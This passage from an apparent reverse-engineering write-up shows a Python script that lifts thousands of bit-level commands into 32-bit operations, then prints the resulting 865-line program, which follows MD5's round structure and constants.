A[0xb40] = A[0xb41] & A[0xb40]

At first, this made me scratch my head as it did not seem to “fit” with the rest of the output. But then I realized that this obscure-looking block of code was actually implementing a 32-bit adder!

This finally made sense with the rest of the logic, and once I was certain that these were all indeed 32-bit operations implemented on bits, I quickly hacked together a second program to convert the 60,180 commands into a new set of commands performed on 32-bit integers:

import re

def MOV(cmd):
    m = re.fullmatch(r'A\[(\w+)\] = ([01])', cmd)
    if m is None:
        return None
    return int(m[1], 0), int(m[2])

def BITW(cmd):
    m = re.fullmatch(r'A\[(\w+)\] = A\[(\w+)\] ([\^|&]) A\[(\w+)\]', cmd)
    if m is None:
        return None
    return int(m[1], 0), m[3], int(m[2], 0), int(m[4], 0)

with open('commands.txt', 'r') as f:
    commands = list(map(str.rstrip, f))

ncommands = []

idx = 0
while idx < len(commands):
    cmd = commands[idx]
    if MOV(cmd):
        chunk = commands[idx:idx+32]
        outs, vals = zip(*[MOV(cmd) for cmd in chunk])
        assert outs == tuple(range(outs[0], outs[-1] - 1, -1)) and outs[-1] & 31 == 0
        val = 0
        for o, v in zip(outs, vals):
            i = o & 31
            val |= v << 8 * (i // 8) + 7 - (i % 8)
        ncommands.append(f'A[{outs[-1]>>5}] = {val:#x}')
        idx += 32
    elif BITW(cmd) and BITW(cmd)[1] == BITW(commands[idx + 1])[1]:
        chunk = commands[idx:idx+32]
        outs, ops, in1s, in2s = zip(*[BITW(cmd) for cmd in chunk])
        if outs[0] & 31 == 0:
            assert outs == tuple(range(outs[0], outs[-1] + 1)) and outs[0] & 31 == 0
            assert len(set(ops)) == 1
            assert in1s == tuple(range(in1s[0], in1s[-1] + 1)) and in1s[0] & 31 == 0
            assert in2s == tuple(range(in2s[0], in2s[-1] + 1)) and in2s[0] & 31 == 0
            ncommands.append(f'A[{outs[0]>>5}] = A[{in1s[0]>>5}] {ops[0]} A[{in2s[0]>>5}]')
        else:
            rotl = (outs.index(min(outs) + 7) + 1) & 31
            ncommands.append(f'A[{outs[0]>>5}] = rotl(A[{in1s[0]>>5}] {ops[0]} A[{in2s[0]>>5}], {rotl})')
            assert [in1s[24 - 8 * (i // 8) + (i % 8)] - min(in1s) == i for i in range(32)]
            assert [in2s[24 - 8 * (i // 8) + (i % 8)] - min(in2s) == i for i in range(32)]
        idx += 32
    else:
        chunk = commands[idx:idx+157]
        outs, ops, in1s, in2s = zip(*[BITW(cmd) for cmd in chunk])
        assert outs.count(0xb40) == 63 and outs.count(0xb41) == 62
        assert ops == ('^', '&') + ('^', '^', '&', '&', '|') * 31
        assert in1s.count(0xb40) == 0 and in1s.count(0xb41) == 93
        assert in2s.count(0xb40) == 93 and in2s.count(0xb41) == 0
        assert outs[33] & 31 == 0 and in1s[32] & 31 == 0 and in2s[32] & 31 == 0
        ncommands.append(f'A[{outs[33]>>5}] = A[{in1s[32]>>5}] + A[{in2s[32]>>5}]')
        idx += 157

print(len(ncommands))

with open('commands2.txt', 'w') as f:
    for cmd in ncommands:
        f.write(cmd + '\n')

There were some tricky implementation details like rotl() somehow being part of the logic, but in the end we are left with a much simpler program with “only” 865 lines:

A[9] = 0xffffffff
A[125] = 0x0
A[126] = 0x0
A[127] = 0x0
A[128] = 0x0
A[0] = A[125] | A[8]
A[1] = A[126] | A[8]
A[2] = A[127] | A[8]
A[3] = A[128] | A[8]
A[10] = 0xd76aa478
A[11] = 0xe8c7b756
A[12] = 0x242070db
A[13] = 0xc1bdceee
A[14] = 0xf57c0faf
A[15] = 0x4787c62a
A[16] = 0xa8304613
A[17] = 0xfd469501
A[18] = 0x698098d8
A[19] = 0x8b44f7af
A[20] = 0xffff5bb1
A[21] = 0x895cd7be
A[22] = 0x6b901122
A[23] = 0xfd987193
A[24] = 0xa679438e
A[25] = 0x49b40821
A[26] = 0xf61e2562
A[27] = 0xc040b340
A[28] = 0x265e5a51
A[29] = 0xe9b6c7aa
A[30] = 0xd62f105d
A[31] = 0x2441453
A[32] = 0xd8a1e681
A[33] = 0xe7d3fbc8
A[34] = 0x21e1cde6
A[35] = 0xc33707d6
A[36] = 0xf4d50d87
A[37] = 0x455a14ed
A[38] = 0xa9e3e905
A[39] = 0xfcefa3f8
A[40] = 0x676f02d9
A[41] = 0x8d2a4c8a
A[42] = 0xfffa3942
A[43] = 0x8771f681
A[44] = 0x6d9d6122
A[45] = 0xfde5380c
A[46] = 0xa4beea44
A[47] = 0x4bdecfa9
A[48] = 0xf6bb4b60
A[49] = 0xbebfbc70
A[50] = 0x289b7ec6
A[51] = 0xeaa127fa
A[52] = 0xd4ef3085
A[53] = 0x4881d05
A[54] = 0xd9d4d039
A[55] = 0xe6db99e5
A[56] = 0x1fa27cf8
A[57] = 0xc4ac5665
A[58] = 0xf4292244
A[59] = 0x432aff97
A[60] = 0xab9423a7
A[61] = 0xfc93a039
A[62] = 0x655b59c3
A[63] = 0x8f0ccc92
A[64] = 0xffeff47d
A[65] = 0x85845dd1
A[66] = 0x6fa87e4f
A[67] = 0xfe2ce6e0
A[68] = 0xa3014314
A[69] = 0x4e0811a1
A[70] = 0xf7537e82
A[71] = 0xbd3af235
A[72] = 0x2ad7d2bb
A[73] = 0xeb86d391
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[10]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[11]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[12]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[13]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[14]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[15]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[16]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[17]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[18]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[19]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[20]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[21]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[22]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 7)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[23]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 12)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[24]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 17)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] & A[2]
A[6] = A[1] ^ A[9]
A[7] = A[6] & A[3]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[25]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 22)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[26]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[27]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[28]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[29]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[30]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[31]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[32]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[33]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[34]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[35]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[36]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[37]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[38]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 5)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[39]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 9)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[40]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 14)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] & A[1]
A[6] = A[3] ^ A[9]
A[7] = A[6] & A[2]
A[4] = A[5] | A[7]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[41]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 20)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[42]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[43]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[44]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[45]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[46]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[47]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[48]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[49]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[50]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[51]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[52]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[53]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[54]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 4)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[55]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 11)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[56]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 16)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[1] ^ A[2]
A[4] = A[5] ^ A[3]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[57]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 23)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[74]
A[4] = A[6] + A[58]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[81]
A[4] = A[6] + A[59]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[88]
A[4] = A[6] + A[60]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[79]
A[4] = A[6] + A[61]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[86]
A[4] = A[6] + A[62]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[77]
A[4] = A[6] + A[63]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[84]
A[4] = A[6] + A[64]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[75]
A[4] = A[6] + A[65]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[82]
A[4] = A[6] + A[66]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[89]
A[4] = A[6] + A[67]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[80]
A[4] = A[6] + A[68]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[87]
A[4] = A[6] + A[69]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[78]
A[4] = A[6] + A[70]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 6)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[85]
A[4] = A[6] + A[71]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 10)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[76]
A[4] = A[6] + A[72]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 15)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
A[5] = A[3] ^ A[9]
A[6] = A[5] | A[1]
A[4] = A[2] ^ A[6]
A[5] = A[4] + A[0]
A[6] = A[5] + A[83]
A[4] = A[6] + A[73]
A[0] = A[3] | A[8]
A[3] = A[2] | A[8]
A[2] = A[1] | A[8]
A[6] = rotl(A[4] | A[8], 21)
A[7] = A[6] + A[1]
A[1] = A[7] | A[8]
